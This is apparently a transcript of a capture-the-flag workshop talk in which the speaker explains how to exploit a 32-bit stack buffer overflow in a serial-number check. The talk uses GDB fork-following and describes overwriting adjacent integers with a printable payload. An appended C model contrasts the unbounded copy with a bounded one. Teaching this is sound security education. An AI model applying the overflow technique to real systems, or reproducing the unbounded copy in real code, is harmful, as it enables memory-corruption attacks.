So this is, I think, where the magic happens. A pointer and a copy to a buffer of a limited length. This one is terminated, so it should be good. This one is not. So the bug is here. Okay, server runs. Now can I connect to it? Yay, okay. So what's cool about that is that we can debug it. Of course. Why? Is there a reason? Because it's a binary, it should work. Linux and its legendary compatibility. Ah, Chris. Ah, fuck off.
No, no, no, it's just too complicated to install. Wait, we're going to drive it. No, it works. Okay, we're going to do that. So the container is meant to compile the binary. It will work on the system on... But this is why you need a Vagrant. This is going to be 64-bit addressing, and the bug is, I think the bug is 32-bit only. I think this is why I need a Vagrant. Oh, I'm going to look completely out of it.

So this is... So I used to teach this like 10 years ago, and this is what I was using to explain the solution. So, yeah, one of the first complexities is that there's a fork call. By default, GDB will not follow the fork into the child; it will stick to the parent. So we need to work around that. Now we could add symbols as well (-g3), and then `set follow-fork-mode child`. And with the symbols, we can break on session. Now, yes, yeah, you need to compile it specifically on Ubuntu 14.04, otherwise, no, or it might, or it might, but you'll have my answer, because my answer is just one string and boom, it blows up, right? So the flag is not... even if you compile it, the flag is on the server. So whatever you'll find locally to exploit will not work on the server, because it's going to be a different thing, which means a different memory address. Same principle, but you won't grab the flag. So this is why you need to mimic the target so that it will work.

So, yeah, so here's the flow, as I was saying: the second string copy here copies to a buffer of eight, but the source can be up to 18. So you will overwrite, and since value two is below value one, you overwrite... no, sorry, since buffer is below the integer values, you overwrite the memory going upwards, which means that you can smash value one and value two at this place. So you have an effect on value one even if you are after it.
So the goal, the way to solve this challenge, is to use the buffer overflow to make sure that you will overwrite value one with something that you know will match value two, and value two you are in control of, because it's whatever your buffer is, and it's the output of the compute function. So in the debugger, if you send... we often see sequences of As, but it's more useful to use different characters, because then you know you're at this position or that position. There are tools in pwndbg that will do that, or Radare has tools like that as well, that generate a sequence of a length that you specify, but here we've done it by hand. I don't recall what they are.

So when we look at the string copy, this is what the memory looks like when you have that. So you can see 41, 42, 43, 44, 45, 46, 47, 48. And if you look at the buffer, this is the content of the buffer. Then value one is this, value two is this. Now after you run, value one, that's the state of the buffer... Man, I don't remember any of this. And value two is this. So they are very different, and it changed drastically after the overwrite. So buffer will receive sn plus nine. So here sn plus nine will be what's sent to buffer.

What's complicated is that there are an infinite number of solutions, because you need to have two things. One thing that you control, that you send; it will be cut in two, run through compute, and compared to one another. But some of it you use to overwrite one of the values. So you need to align them. So the solution we are narrowing in on is one of the many solutions that could be. So if we smash value one, we can make it so as to pass the test. Validate will be true. So now we did like fake tests, if you want. So, you know, value two is this, value one is this. So we're not quite there. And also you have to avoid non-printable characters.
So try different input, iterate on what you send until everything that you need, that value two, is printable characters, so that you will be able to overwrite value one with printable characters. Doesn't it stop only on the 0x00? Oh, okay. So yeah, there are a handful of them that will stop the copy. So basically the ABCDEFG payload, you know, got us there, but we cannot progress with it, because after it goes through... not validate, compute, it will generate non-printable characters, which means that it's not a good payload for the exploitation. Now if we send many As, you will get into a mode where everything is ASCII. So value two, everything is ASCII. Now that we control value two, now that we know value two is all ASCII, we need to just adjust our payload so that value one will match value two. And we can do that locally because we can debug the program.

And again, I mean, this is like the shittiest... I did it that way at university. This is how I wrote it up. And this was before angr. I'm sure with angr, someone who knows how this thing works will solve this like this. angr basically, you know, goes through all possibilities and finds the one that narrows down to the state that you want to be in. It's just, I've never used angr except in a workshop, never used it after. So I would need more work. This is why it was a bonus. I need to prepare more in order to teach it better, but you'll still have the solution.

So in my testing, I arrived at a payload that I thought would work by doing the math, but there was an issue. I was obtaining something slightly different. But if you invert the two values and you add the As, then I arrived at a payload that worked. And this is basically the exploit for that challenge. It will get it in the state that you need to be in.
So I can show you, but I mean, the better way would be to debug it, but with the error I'm getting, I'm not convinced that by running it on a 64-bit system this solution will work, but we can try. Yeah, I don't know if I wanted to do a local payload, but it wouldn't work on the other one. Oh, yeah, that will work. I've already done it. No, but I want to try to crash it. I don't want to do the solution yet. I have 11 minutes left. We've got a hammer; he's getting my stuff. You're right. You're right. You are correct, sir. Okay, let's try to run it. So now I've shown you the solution. We're going to wait until the end for the money shot. So now I'm going to try it in the 64-bit environment. We'll see what it looks like. We'll try to go, but I'm not convinced that we're going to progress much in 10 minutes. But what my son was saying is that I need to do all of the `set follow-fork-mode` whatever, to be able to put it in the right state, where I will follow the child. And then I could run it, but not sure what it will look like without symbols.

Okay, so it's dying. And can I connect again? Yes, okay. But I don't have any breakpoint. Do I need to use a 32-bit GDB? Google: "GDB 32-bit mode". Let's compile with this bot. Okay, you do my searches more quickly than I do. "Error disabling address space randomization: operation not permitted." No, no, but the Docker, more or less privileged, surely. But even if it doesn't randomize, it's not serious, because I don't pass it. It's a local stack smash. A local smash, it should work. It's GDB. I think it's GDB, because GDB has to try to disable that. Okay, we're going to copy it. Yeah, that would be the trip, the debug. Yes, one minute. Let's paste the payload. Okay, so the service is running here. Ah, stack corruption, for the win. So, I mean, I wish I had something better to show you, but what happens is that, again, from the source code here, we are providing a buffer that is too large here.
And the first string copy is fine, because there is no pointer, no byte that is injected in the original char buffer that will make the string copy stop, and after a fixed amount of characters, that is the size of the buffer, then value one is computed. We have no control over any of this besides the regular first part of the serial number. Now the second string copy arrives, into a new buffer; we're kind of reusing one variable here. But then we copy from the ninth position, where nothing was done to ensure the length of the thing, besides it accepting between this and that. So then this copy will overwrite content, and it will overwrite upwards. So the stack is both value two, value one, or both value one, value two. But so you are overwriting content in memory and then value two is computed. So, no, yes, you overwrite value two and value one, but value two is then rewritten. So then you have to make sure that whatever is rewritten here and whatever you overflow there are equal, and must be printable characters, and the way to achieve this is: when you have a lot of As through the validate function... the compute function, sorry, it will create this value, I think this value. And yeah, so this one was extracted from a run. And so this is when we figured that we need to put this at the end, but it turns out that it was not long enough or whatever. So when looking at it, you realize that the two characters are inverted here. So you flip them in the right order and then you pad with two other As, and then you get the answer. And if we do the smash: stack corruption, for the win, yay. I completely cheated. Oh, two solves. Someone from here, did you figure it out or did you copy? Because I was going to say next year you're here.

Okay, well, thank you so much, everyone. It's been quite a ride. And now I must... Honestly, I hope you have a great CTF, and if you have questions, do not hesitate to come and see any of us. We're here to learn.
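Added example, not code from the talk or from the challenge: a constructed C model of the frame the speaker describes in the exploitation part (an 8-byte buffer with two integers above it, the second copy taken from sn + 9), showing the unbounded copy spilling upward into value1 and value2, a bounded copy beside it, and the printable-bytes check the speaker applies to the payload. The struct layout, the function and field names, the sentinel values and the sample serial are assumptions made here for the demonstration; a real compiler may lay locals out differently, and the challenge's compute function is not shown in the transcript, so it is not modelled.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of the frame the talk describes: an 8-byte buffer with two
 * integers sitting above it. A real compiler is free to lay locals out
 * differently; the struct pins the layout so the walkthrough is deterministic. */
struct frame {
    char     buffer[8];
    uint32_t value1;
    uint32_t value2;
};

/* Unbounded copy, the shape of strcpy(buffer, sn + 9): bytes run upward from
 * buffer into value1 and value2. Like strcpy it stops only at a NUL byte.
 * The copy is clipped at the end of the model; in the real program the tail
 * would keep going into whatever sits above value2 on the stack. */
static int vulnerable_copy(struct frame *f, const char *tail)
{
    size_t n = strlen(tail) + 1;                 /* include the terminator */
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy((unsigned char *)f, tail, n);
    return (int)strlen(tail);
}

/* Bounded copy: never writes outside buffer and always NUL-terminates it. */
static int safe_copy(struct frame *f, const char *tail)
{
    size_t n = 0;
    while (n < sizeof f->buffer - 1 && tail[n] != '\0')
        n++;
    memcpy(f->buffer, tail, n);
    f->buffer[n] = '\0';
    return (int)n;
}

/* The second copy the talk describes takes the serial from position 9 on
 * (sn + 9). Returns -1 if the serial is too short to have a tail at all. */
static int second_copy(struct frame *f, const char *sn, int hardened)
{
    if (strlen(sn) <= 9)
        return -1;
    return hardened ? safe_copy(f, sn + 9) : vulnerable_copy(f, sn + 9);
}

/* The payload constraint from the talk: every byte must be printable, and no
 * byte may be NUL (which would terminate the copy early). How the service
 * reads input may rule out further bytes, such as newline; isprint rejects
 * those as well. */
static int payload_is_printable(const char *p)
{
    for (; *p != '\0'; p++)
        if (!isprint((unsigned char)*p))
            return 0;
    return 1;
}

int main(void)
{
    /* Constructed serial: 9 leading bytes, then a 16-byte tail that exactly
     * spans buffer (8) + value1 (4) + value2 (4). Sentinels show what moved. */
    const char *serial = "SERIAL123ABCDEFGHIJKLMNOP";
    struct frame f = { "", 0x11111111u, 0x22222222u };
    struct frame g = { "", 0x11111111u, 0x22222222u };

    second_copy(&f, serial, 0);
    printf("vulnerable: buffer=%.8s value1=%08x value2=%08x\n",
           f.buffer, (unsigned)f.value1, (unsigned)f.value2);

    second_copy(&g, serial, 1);
    printf("hardened:   buffer=%s value1=%08x value2=%08x\n",
           g.buffer, (unsigned)g.value1, (unsigned)g.value2);

    printf("payload printable: %d\n", payload_is_printable(serial + 9));
    return 0;
}
```

Distinct letters in the tail (the speaker's point about not using only As) make it obvious which payload offsets landed in value1 and value2: bytes 8 to 11 and 12 to 15 of the tail. In the real target the bytes that end up in value1 have to equal what compute produces from the controlled part, which is the search the speaker does by hand in the debugger.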